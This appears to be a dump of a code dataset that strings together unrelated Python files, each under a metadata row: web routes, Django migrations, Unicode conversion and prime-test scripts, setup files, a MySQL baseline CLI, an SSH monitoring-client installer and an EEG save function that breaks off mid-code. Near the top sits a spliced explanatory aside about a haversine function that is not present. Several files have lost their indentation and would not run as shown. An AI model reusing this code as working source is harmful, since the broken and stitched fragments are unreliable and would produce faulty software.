@router.post("/whereAmI")
def get_where_am_i(local: pairCoordinate):
location = getLocation(local)
return {"Location": location}
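`linear_distance` above delegates to `HaversineService`; the underlying great-circle formula can be sketched standalone (the Earth radius of 6371 km is an assumption here — the actual service may use a different constant):

```python
import math

def haversine_km(lat1, lon1, lat2, lon2, radius_km=6371.0):
    """Great-circle distance between two (lat, lon) points in kilometres."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2
    return 2 * radius_km * math.asin(math.sqrt(a))

print(haversine_km(0.0, 0.0, 0.0, 180.0))  # half the equator
```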
a0631cc292309e8b9997f259d7c5466d5db03bb2 | 267 | py | Python | datahub/investment/summary/urls.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | ["MIT"] | issues: 4
from django.urls import path
from datahub.investment.summary.views import IProjectSummaryView
urlpatterns = [
path(
'adviser/<uuid:adviser_pk>/investment-summary',
IProjectSummaryView.as_view(),
name='investment-summary-item',
),
]
a063d521cdf29cd6f0c8ec8a587747f330d103e6 | 1,598 | py | Python | VulnerableScan/migrations/0004_remove_exploitregister_file_object_and_more.py | b0bac/ApolloScanner | 26612454bfb302611e407e495c2943b27285f23d | ["MIT"] | stars: 289 | issues: 18 | forks: 71
# Generated by Django 4.0.1 on 2022-03-10 17:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('Assets', '0003_alter_assetlist_timestamp_alter_assettask_timestamp'),
('VulnerableScan', '0003_alter_exploitregister_timestamp_and_more'),
]
operations = [
migrations.RemoveField(
model_name='exploitregister',
name='file_object',
),
migrations.AddField(
model_name='exploitregister',
name='code',
field=models.TextField(db_column='code', null=True, verbose_name='负载代码'),
),
migrations.AddField(
model_name='exploitregister',
name='debug_info',
field=models.TextField(blank=True, db_column='debug_info', default='', null=True, verbose_name='调试信息'),
),
migrations.AddField(
model_name='exploitregister',
name='function_name',
field=models.CharField(db_column='function_name', default='', max_length=100, verbose_name='函数名称'),
),
migrations.AddField(
model_name='exploitregister',
name='target',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='Assets.assetlist', verbose_name='调试目标'),
),
migrations.AlterField(
model_name='exploitregister',
name='description',
field=models.TextField(db_column='description', verbose_name='负载描述'),
),
]
a08de9a7f78d2b4c6c046592a71b3e0b286148ff | 1,391 | py | Python | misc/make_fulltohalf.py | atsuoishimoto/pyjf3 | 6f4b22e24c8f3bae5120b00e1de86e66fabb1785 | ["Unlicense"] | issues: 2
import unicodedata
chars = []
for c in range(1, 65536):
    c = chr(c)  # unichr in the original Python 2 script
name = unicodedata.name(c, '')
if name.startswith("FULLWIDTH") or name.startswith("HALFWIDTH"):
chars.append((name, c))
d = {}
for name, c in chars:
p = name.split()
if p[0] in ('HALFWIDTH', 'FULLWIDTH'):
name = " ".join(p[1:])
normal = full = half = None
try:
normal = unicodedata.lookup(name)
except KeyError:
pass
try:
full = unicodedata.lookup("FULLWIDTH "+name)
except KeyError:
pass
try:
half = unicodedata.lookup("HALFWIDTH "+name)
except KeyError:
pass
if normal or full or half:
d[name] = (normal, full, half)
d2 = {}
for name, (normal, full, half) in d.items():
if full:
if normal:
pair = (full, normal)
elif half:
pair = (full, half)
if half:
if normal:
pair = (normal, half)
elif full:
pair = (full, half)
try:
pair[0].encode("cp932")
pair[1].encode("cp932")
except UnicodeEncodeError:
continue
d2[name] = pair
d2['YEN SIGN'] = (u'\uffe5', u'\x5c')
l = []
for name, (full, half) in d2.items():
    print("%r:%r,\t# %s" % (full, half, name))
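The table built above pairs each fullwidth form with its halfwidth or normal counterpart via Unicode character names. For most characters the stdlib can do the same conversion directly through NFKC normalization, which is a handy cross-check (compatibility normalization, not the exact table generated above):

```python
import unicodedata

fullwidth = "ＡＢＣ１２３！"          # FULLWIDTH latin letters, digits, punctuation
halfwidth = "".join(unicodedata.normalize("NFKC", ch) for ch in fullwidth)
print(halfwidth)  # ABC123!
```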
a08e666451ce46ff1ce96123e7fca104a0847a50 | 957 | py | Python | server/service_user/exports.py | yseiren87/jellicleSpace | 10d693bbc04e6b89a7ce15d2dc9797cec2a553b7 | ["Apache-2.0"] | issues: 7
from service_user.models import UserModel
from django.core.exceptions import ValidationError
def get_user_instance_with_session_id(user_id, session_id):
try:
instance = UserModel.objects.get(
user_id__exact=user_id,
session_id__exact=session_id
)
except (UserModel.DoesNotExist, ValidationError):
return None
return instance
def is_valid_user_with_session_id(user_id, session_id):
return get_user_instance_with_session_id(user_id, session_id) is not None
def get_user_instance_with_token_id(user_id, token_id):
try:
instance = UserModel.objects.get(
user_id__exact=user_id,
token_id__exact=token_id
)
except (UserModel.DoesNotExist, ValidationError):
return None
return instance
def is_valid_user_with_token_id(user_id, token_id):
return get_user_instance_with_token_id(user_id=user_id, token_id=token_id) is not None
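Both helpers above wrap `Model.objects.get` in a try/except so a miss yields `None` instead of raising. The pattern in isolation, with a list of dicts standing in for the Django queryset (`get_or_none` and `users` are hypothetical names):

```python
def get_or_none(rows, **filters):
    """Mirror of the lookup wrappers above: exactly one match returns the
    row, anything else returns None. `rows` is a stand-in data store."""
    matches = [r for r in rows if all(r.get(k) == v for k, v in filters.items())]
    return matches[0] if len(matches) == 1 else None

users = [{"user_id": 1, "session_id": "abc"}]
print(get_or_none(users, user_id=1, session_id="abc"))
```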
| 26.583333 | 90 | 0.734587 | 134 | 957 | 4.791045 | 0.201493 | 0.102804 | 0.087227 | 0.11838 | 0.775701 | 0.746106 | 0.727414 | 0.65109 | 0.551402 | 0.551402 | 0 | 0 | 0.207941 | 957 | 35 | 91 | 27.342857 | 0.846966 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0.083333 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a090bdf83760eb6503d8fb43df6988333a3549dc | 178 | py | Python | basics/8 - conditional logic/app.py | gilbertgit95/py-tests | cc0028a92b40cd6f5476a184b1c6d69009c5a68a | [
"MIT"
] | null | null | null | basics/8 - conditional logic/app.py | gilbertgit95/py-tests | cc0028a92b40cd6f5476a184b1c6d69009c5a68a | [
"MIT"
] | 10 | 2020-02-12T02:55:21.000Z | 2022-02-10T09:46:47.000Z | basics/8 - conditional logic/app.py | gilbertgit95/py-tests | cc0028a92b40cd6f5476a184b1c6d69009c5a68a | [
"MIT"
] | null | null | null | province = input('Enter you province: ')
if province.lower() == 'surigao':
    print('Hi, I am from Surigao too.')
else:
    print(f"Hi, so you're from {province.capitalize()}") | 29.666667 | 56 | 0.646067 | 25 | 178 | 4.6 | 0.72 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179775 | 178 | 6 | 56 | 29.666667 | 0.787671 | 0 | 0 | 0 | 0 | 0 | 0.530726 | 0.117318 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a0a44839a72d7d8be56e23c36ab6608c90156600 | 1,427 | py | Python | tests/test_primes.py | dazfuller/python_testing | 7ef763ce5a78dcda158364eb3c564dd74a9405a5 | [
"MIT"
] | null | null | null | tests/test_primes.py | dazfuller/python_testing | 7ef763ce5a78dcda158364eb3c564dd74a9405a5 | [
"MIT"
] | null | null | null | tests/test_primes.py | dazfuller/python_testing | 7ef763ce5a78dcda158364eb3c564dd74a9405a5 | [
"MIT"
] | null | null | null | """ Test cases for sample module
"""
import unittest
from sample.primes import (approx_number_primes, is_prime)


class TestPrimeMethods(unittest.TestCase):
    """ Test the methods defined for prime numbers
    """

    def test_approx_small_values(self):
        """ Check that the method to approximate the number of primes is
        working as expected
        """
        self.assertGreater(approx_number_primes(10), 4)

    def test_approx_larger_values(self):
        """ Determine if the method still works for slightly larger values
        """
        self.assertGreater(approx_number_primes(100), 25)

    def test_known_primes(self):
        """ Check a number of known primes to ensure the prime evaluator
        method works
        """
        self.assertTrue(is_prime(2))
        self.assertTrue(is_prime(7))
        self.assertTrue(is_prime(997))
        self.assertTrue(is_prime(7907))

    def test_known_non_primes(self):
        """ Check that the prime evaluator correctly identifies non-prime
        numbers as non-prime
        """
        self.assertFalse(is_prime(4))
        self.assertFalse(is_prime(93))
        self.assertFalse(is_prime(9994))

    def test_prime_check_nonint(self):
        """ Check that the method correctly raises an error if an invalid
        type is provided
        """
        with self.assertRaises(TypeError):
            is_prime("Invalid")
| 31.711111 | 73 | 0.640505 | 175 | 1,427 | 5.057143 | 0.394286 | 0.071186 | 0.072316 | 0.094915 | 0.128814 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023166 | 0.274001 | 1,427 | 44 | 74 | 32.431818 | 0.831081 | 0.320252 | 0 | 0 | 0 | 0 | 0.008314 | 0 | 0 | 0 | 0 | 0 | 0.526316 | 1 | 0.263158 | false | 0 | 0.105263 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a0a7a1a4f0c41ecd55f54af87c75350bfdbefffc | 1,395 | py | Python | peachproxy/setup.py | Meddington/TravisExample | 334344a3bdf76cc81950f707003f73e7e5f06661 | [
"MIT"
] | null | null | null | peachproxy/setup.py | Meddington/TravisExample | 334344a3bdf76cc81950f707003f73e7e5f06661 | [
"MIT"
] | null | null | null | peachproxy/setup.py | Meddington/TravisExample | 334344a3bdf76cc81950f707003f73e7e5f06661 | [
"MIT"
] | null | null | null | from setuptools import setup
setup(
    name='peachproxy',
    version='4.1.0',
    # use_scm_version=True,
    description='Peach Web Proxy API module',
    long_description="blah blah blah",
    author='Peach Fuzzer, LLC',
    author_email='contact@peachfuzzer.com',
    url='http://peachfuzzer.com',
    py_modules=['peachproxy'],
    entry_points={'pytest11': ['peach = pytest_peach']},
    setup_requires=['setuptools_scm'],
    install_requires=['requests>=2.11'],
    license='MIT',
    keywords='peach fuzzing security test rest',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: POSIX',
        'Operating System :: Microsoft :: Windows',
        'Operating System :: MacOS :: MacOS X',
        'Topic :: Security',
        'Topic :: Software Development :: Quality Assurance',
        'Topic :: Software Development :: Testing',
        'Topic :: Utilities',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5'])
# end
| 32.44186 | 61 | 0.58638 | 137 | 1,395 | 5.89781 | 0.569343 | 0.164604 | 0.216584 | 0.128713 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020629 | 0.270251 | 1,395 | 42 | 62 | 33.214286 | 0.773084 | 0.017921 | 0 | 0 | 0 | 0 | 0.58114 | 0.016813 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.030303 | 0 | 0.030303 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a0b95281e810c294a2a866c57cc8b3ec0542cc4d | 1,202 | py | Python | mopidy_beep/__init__.py | hayribakici/mopidy-beep | d534caff4f5469d2c24e4040f52a2e700834a680 | [
"Apache-2.0"
] | null | null | null | mopidy_beep/__init__.py | hayribakici/mopidy-beep | d534caff4f5469d2c24e4040f52a2e700834a680 | [
"Apache-2.0"
] | null | null | null | mopidy_beep/__init__.py | hayribakici/mopidy-beep | d534caff4f5469d2c24e4040f52a2e700834a680 | [
"Apache-2.0"
] | null | null | null | '''
Mopidy Beep Python module.
'''
import os

import mopidy

__version__ = '0.1'


class Extension(mopidy.ext.Extension):
    '''
    Mopidy Beep extension.
    '''

    dist_name = 'Mopidy-Beep'
    ext_name = 'beep'
    version = __version__

    def get_default_config(self):  # pylint: disable=no-self-use
        '''
        Return the default config.

        :return: The default config
        '''
        conf_file = os.path.join(os.path.dirname(__file__), 'ext.conf')
        return mopidy.config.read(conf_file)

    def get_config_schema(self):
        '''
        Return the config schema.

        :return: The config schema
        '''
        schema = super(Extension, self).get_config_schema()
        return schema

    def validate_environment(self):
        # Any manual checks of the environment to fail early.
        # Dependencies described by setup.py are checked by Mopidy, so you
        # should not check their presence here.
        pass

    def setup(self, registry):
        '''
        Setup the extension.

        :param mopidy.ext.Registry: The mopidy registry
        '''
        from .frontend import BeepFrontend
        registry.add('frontend', BeepFrontend)
| 22.259259 | 74 | 0.613145 | 138 | 1,202 | 5.173913 | 0.463768 | 0.05042 | 0.044818 | 0.061625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002345 | 0.290349 | 1,202 | 53 | 75 | 22.679245 | 0.834701 | 0.343594 | 0 | 0 | 0 | 0 | 0.050822 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0.055556 | 0.166667 | 0 | 0.722222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
2611696052388cf7da145be3bdca70a633645ea6 | 3,089 | py | Python | db_bascline.py | wstart/DB_BaseLine | fb54b4faa199dfdf3539d8b7c855684e850cbee5 | [
"Apache-2.0"
] | 152 | 2018-04-23T00:47:23.000Z | 2022-03-24T07:34:40.000Z | db_bascline.py | Dm2333/DB_BaseLine | fb54b4faa199dfdf3539d8b7c855684e850cbee5 | [
"Apache-2.0"
] | 4 | 2018-05-24T03:09:39.000Z | 2021-06-12T07:40:46.000Z | db_bascline.py | wstart/DB_BaseLine | fb54b4faa199dfdf3539d8b7c855684e850cbee5 | [
"Apache-2.0"
] | 49 | 2018-04-23T00:57:22.000Z | 2022-03-24T07:34:42.000Z | # -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
from script.mysql_baseline import *
from loghandle import *
import getopt
if __name__ == "__main__":
    bannber = '''
____ ____ ____ _ _ {''' + db_baseline_basic.getVersion() + '''}
| _ \| __ )| __ ) __ _ ___ ___| (_)_ __ ___
| | | | _ \| _ \ / _` / __|/ _ \ | | '_ \ / _ \\
| |_| | |_) | |_) | (_| \__ \ __/ | | | | | __/
|____/|____/|____/ \__,_|___/\___|_|_|_| |_|\___|
(https://github.com/wstart/DB_BaseLine)
--------------------------------------------------'''
    supperdb = ["mysql"]
    DBnames = ",".join(supperdb)
    small_helper = '''
Usage: python db_baseline.py [options]
python db_baseline.py -h for more information
'''
    helper = '''
Usage: python db_baseline.py [options]
[Options]:
-v ,--version show version
-h,--help show help
-D,--database check DataBase type,default is mysql
support Database list: ''' + DBnames + '''
-H,--host host,Default:127.0.0.1
if host is not 127.0.0.1 or localhost only check command
-P,--database-port database port,Default:Database Default port
it will set by check script
-u,--database-user database rootuser,default:root
-p,--database-password database password,default:root
'''
    plog = loghandle.getLogEntity()
    plog.output(bannber, "INFO", showtime=False, showlevel=False)
    runconfig = {
        "database": "",
        "host": "",
        "database_port": "",
        "database_user": "",
        "database_password": ""
    }
    try:
        opts, args = getopt.getopt(sys.argv[1:], "vhD:H:P:u:p:",
                                   ["version", "help", "database=", "host=", "database-port=", "database-user=",
                                    "database-password="])
        checkscript = ""
        if len(opts) == 0:
            print small_helper
            exit()
        for o, a in opts:
            if o in ("-v", "--version"):
                print("DB_BASELINE : " + db_baseline_basic.getVersion())
                sys.exit()
            elif o in ("-h", "--help"):
                print helper
                sys.exit()
            elif o in ("-D", "--database"):
                runconfig["database"] = a
            elif o in ("-H", "--host"):
                runconfig["host"] = a
            elif o in ("-P", "--database-port"):
                runconfig["database_port"] = a
            elif o in ("-u", "--database-user"):  # was "-U", which getopt never yields: the short option is declared as "u:"
                runconfig["database_user"] = a
            elif o in ("-p", "--database-password"):
                runconfig["database_password"] = a
        if runconfig["database"] == "mysql":
            checkscript = mysql_baseline(runconfig)
        if checkscript != "":
            result = checkscript.runtest()
        else:
            plog.output("No matching DataBase type", "ERROR")
            print small_helper
        plog.output("DBBaseline exit()")
    except getopt.GetoptError:
        print helper
| 30.584158 | 112 | 0.499838 | 293 | 3,089 | 4.897611 | 0.337884 | 0.04878 | 0.029268 | 0.0223 | 0.165854 | 0.146341 | 0.122648 | 0.072474 | 0 | 0 | 0 | 0.007707 | 0.327938 | 3,089 | 100 | 113 | 30.89 | 0.683526 | 0.006798 | 0 | 0.126582 | 0 | 0.037975 | 0.454012 | 0.058056 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.063291 | 0.050633 | null | null | 0.063291 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
26174133f8e58b2e662f395618e6c08edeaae306 | 5,653 | py | Python | monitor/dispatch/install_clients.py | opnfv/bottlenecks | b6c7bba0c071b42172283e4d97a3641f6464857a | [
"Apache-2.0"
] | 1 | 2019-04-20T08:42:49.000Z | 2019-04-20T08:42:49.000Z | monitor/dispatch/install_clients.py | opnfv/bottlenecks | b6c7bba0c071b42172283e4d97a3641f6464857a | [
"Apache-2.0"
] | 2 | 2020-04-30T00:07:15.000Z | 2021-06-02T00:33:47.000Z | monitor/dispatch/install_clients.py | opnfv/bottlenecks | b6c7bba0c071b42172283e4d97a3641f6464857a | [
"Apache-2.0"
] | 3 | 2016-12-09T10:20:55.000Z | 2019-04-22T12:45:00.000Z | ##############################################################################
# Copyright (c) 2018 Huawei Tech and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
'''
Currently supported installers are Apex, Compass...
Supported monitoring tools are Cadvisor, Collectd, Barometer...
Be careful not to change the path or name of the configuration files, which
are hard coded for docker volume mapping.
'''
import os
import logging
import yaml
import utils.infra_setup.passwordless_SSH.ssh as ssh
import argparse
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser(description='Monitoring Clients Dispatcher')
parser.add_argument("-i", "--INSTALLER_TYPE",
                    help="The installer for the system under monitoring")
# Barometer config and installation files
# /home/opnfv/bottlenecks/monitor/dispatch/install_barometer_client.sh
# /home/opnfv/bottlenecks/monitor/config/barometer_client.conf
# Cadvisor installation file
# /home/opnfv/bottlenecks/monitor/dispatch/install_cadvisor_client.sh
# Collectd config and installation files
# /home/opnfv/bottlenecks/monitor/dispatch/install_collectd_client.sh
# /home/opnfv/bottlenecks/monitor/config/collectd_client.conf
parser.add_argument("-s", "--INSTALlATION_SCRIPT",
                    help="The path of the script that installs the monitoring client")
parser.add_argument("-c", "--CLIENT_CONFIG", default="",
                    help="The path of the monitoring client config")
parser.add_argument("-p", "--POD_DISCRIPTOR", default="/tmp/pod.yaml",
                    help="The path of the pod description file")
args = parser.parse_args()
INSTALLERS = ['apex', 'compass']
if args.INSTALLER_TYPE not in INSTALLERS:
    raise Exception("The installer is not supported.")
if not args.INSTALlATION_SCRIPT:
    raise Exception("Must specify the client installation script path!")
if "barometer" in args.INSTALlATION_SCRIPT.lower():
    CONFIG_FILE = "/etc/barometer_config/barometer_client.conf"
    CONFIG_DIR = "barometer_config"
    INSTALlATION_SCRIPT = "/etc/barometer_config/install.sh"
elif "collectd" in args.INSTALlATION_SCRIPT.lower():
    CONFIG_FILE = "/etc/collectd_config/collectd_client.conf"
    CONFIG_DIR = "collectd_config"
    INSTALlATION_SCRIPT = "/etc/collectd_config/install.sh"
elif "cadvisor" in args.INSTALlATION_SCRIPT.lower():
    CONFIG_DIR = "cadvisor_config"
    INSTALlATION_SCRIPT = "/etc/cadvisor_config/install.sh"
else:
    raise Exception("The monitor client is not supported")
def main():
    with open(args.POD_DISCRIPTOR) as f:
        dataMap = yaml.safe_load(f)
    for x in dataMap:
        for y in dataMap[x]:
            print("Installing {} in: {}".format(INSTALlATION_SCRIPT, y))
            pwd = idkey = ''
            if (y['role'].lower() == 'controller') or (
                    y['role'].lower() == 'compute'):
                ip = str(y['ip'])
                user = str(y['user'])
                if 'password' in y.keys():
                    pwd = str(y['password'])
                if 'key_filename' in y.keys():
                    idkey = str(y['key_filename'])
                if pwd:
                    ssh_d = ssh.SSH(user, host=ip, password=pwd)
                elif idkey:
                    idkey = "/tmp/id_rsa"
                    ssh_d = ssh.SSH(user, host=ip, key_filename=idkey)
                status, stdout, stderr = ssh_d.execute(
                    "cd /etc && if [ ! -d " + CONFIG_DIR +
                    " ]; then sudo mkdir " + CONFIG_DIR + "; fi"
                )
                if status:
                    print Exception(
                        "Command: \"mkdir {}\"".format(CONFIG_DIR) +
                        " failed."
                    )
                logger.info(stdout.splitlines())
                if args.CLIENT_CONFIG:
                    with open(args.CLIENT_CONFIG) as stdin_file:
                        ssh_d.run("sudo sh -c \"cat > " + CONFIG_FILE +
                                  "\"",
                                  stdin=stdin_file)
                with open(args.INSTALlATION_SCRIPT) as stdin_file:
                    ssh_d.run("sudo sh -c \"cat > " + INSTALlATION_SCRIPT +
                              "\"",
                              stdin=stdin_file)
                NODE_OS = ''  # default, so the check below cannot hit an undefined name
                for u in os.uname():
                    if 'ubuntu' in u.lower():
                        NODE_OS = 'ubuntu'
                        break
                if NODE_OS == 'ubuntu':
                    status, stdout, stderr = ssh_d.execute(
                        "sudo apt-get install -y docker.io"
                    )
                else:
                    status, stdout, stderr = ssh_d.execute(
                        "sudo service docker start"
                    )
                if status:
                    raise Exception(
                        "Command for installing docker failed.")
                logger.info(stdout.splitlines())
                ssh_d.run(
                    "cd /etc/{}/ && bash ./install.sh".format(CONFIG_DIR),
                    raise_on_error=False
                )
if __name__ == '__main__':
    main()
| 43.821705 | 79 | 0.537944 | 586 | 5,653 | 5.042662 | 0.303754 | 0.073096 | 0.033841 | 0.045685 | 0.225381 | 0.192893 | 0.157022 | 0.093401 | 0.064975 | 0.064975 | 0 | 0.002132 | 0.336105 | 5,653 | 128 | 80 | 44.164063 | 0.785238 | 0.12542 | 0 | 0.136842 | 0 | 0 | 0.222149 | 0.0439 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.052632 | 0.052632 | null | null | 0.021053 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
26441a9d01cbe05dfe88c39dbad0f18d05f95cd3 | 281 | py | Python | src/api/serializers/operations.py | artinnok/billing-gateway | fbb0b358066a0038e775e6a9c4d40bcdf8f79e8e | [
"MIT"
] | null | null | null | src/api/serializers/operations.py | artinnok/billing-gateway | fbb0b358066a0038e775e6a9c4d40bcdf8f79e8e | [
"MIT"
] | 4 | 2021-03-18T23:34:38.000Z | 2021-06-04T22:27:26.000Z | src/api/serializers/operations.py | artinnok/billing-gateway | fbb0b358066a0038e775e6a9c4d40bcdf8f79e8e | [
"MIT"
] | 1 | 2020-02-11T09:20:30.000Z | 2020-02-11T09:20:30.000Z | from rest_framework.serializers import ModelSerializer
from billing.models import Operation
class OperationSerializer(ModelSerializer):
    class Meta:
        model = Operation
        fields = ('id', 'direction', 'amount', 'fee', 'sender', 'receiver', 'payment', 'account',)
| 25.545455 | 98 | 0.704626 | 27 | 281 | 7.296296 | 0.814815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.174377 | 281 | 10 | 99 | 28.1 | 0.849138 | 0 | 0 | 0 | 0 | 0 | 0.170819 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
26444bcfc025a10d1d56e997d8f362078f4f5b52 | 367 | py | Python | app/tests/conftest.py | pkavousi/similar-users | 8434e0a03dc8dfa218a34601431c564dff3e80b6 | [
"FTL",
"RSA-MD"
] | null | null | null | app/tests/conftest.py | pkavousi/similar-users | 8434e0a03dc8dfa218a34601431c564dff3e80b6 | [
"FTL",
"RSA-MD"
] | null | null | null | app/tests/conftest.py | pkavousi/similar-users | 8434e0a03dc8dfa218a34601431c564dff3e80b6 | [
"FTL",
"RSA-MD"
] | null | null | null | from typing import Generator
import pytest
from fastapi.testclient import TestClient
from app.main import app
@pytest.fixture(scope="module")
def test_data():
    sample_data = {"user_handle": 1}
    return sample_data


@pytest.fixture()
def client() -> Generator:
    with TestClient(app) as _client:
        yield _client
    app.dependency_overrides = {}
| 18.35 | 41 | 0.713896 | 46 | 367 | 5.543478 | 0.565217 | 0.101961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003378 | 0.19346 | 367 | 19 | 42 | 19.315789 | 0.858108 | 0 | 0 | 0 | 0 | 0 | 0.046322 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.307692 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
264e6add1ba15a65e94aadac1a00129404f02466 | 3,323 | py | Python | code/benchmark_networks/save_method.py | datalw/EEGdenoiseNet | f32d3a3e417fdc3c473854d3373ed470e89a67f9 | [
"MIT"
] | null | null | null | code/benchmark_networks/save_method.py | datalw/EEGdenoiseNet | f32d3a3e417fdc3c473854d3373ed470e89a67f9 | [
"MIT"
] | null | null | null | code/benchmark_networks/save_method.py | datalw/EEGdenoiseNet | f32d3a3e417fdc3c473854d3373ed470e89a67f9 | [
"MIT"
] | null | null | null | import os
import numpy as np
from data_prepare import *
from Network_structure import *
from loss_function import *
from train_method import *
def save_eeg(saved_model, result_location, foldername, save_train, save_vali, save_test,
             noiseEEG_train, EEG_train, noiseEEG_val, EEG_val, noiseEEG_test, EEG_test, train_num, denoise_network, datanum):
    if save_train == True:
        try:
            # generate every signal in training set
            Denoiseoutput_train, _ = test_step(saved_model, noiseEEG_train, EEG_train, denoise_network, datanum)
            if not os.path.exists(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output'):
                os.makedirs(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output')
            np.save(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output' + '/' + 'noiseinput_train.npy', noiseEEG_train)
            np.save(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output' + '/' + 'Denoiseoutput_train.npy', Denoiseoutput_train)  ####################### change the address!
            np.save(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output' + '/' + 'EEG_train.npy', EEG_train)
        except:
            print("Error during saving training signal.")
    if save_vali == True:
        try:
            # generate every signal in validation set
            Denoiseoutput_val, _ = test_step(saved_model, noiseEEG_val, EEG_val, denoise_network, datanum)
            if not os.path.exists(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output'):
                os.makedirs(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output')
            np.save(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output' + '/' + 'noiseinput_val.npy', noiseEEG_val)
            np.save(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output' + '/' + 'Denoiseoutput_val.npy', Denoiseoutput_val)  ####################### change the address!
            np.save(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output' + '/' + 'EEG_val.npy', EEG_val)
        except:
            print("Error during saving validation signal.")
    if save_test == True:
        try:
            # generate every signal in test set
            Denoiseoutput_test, _ = test_step(saved_model, noiseEEG_test, EEG_test, denoise_network, datanum)
            if not os.path.exists(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output'):
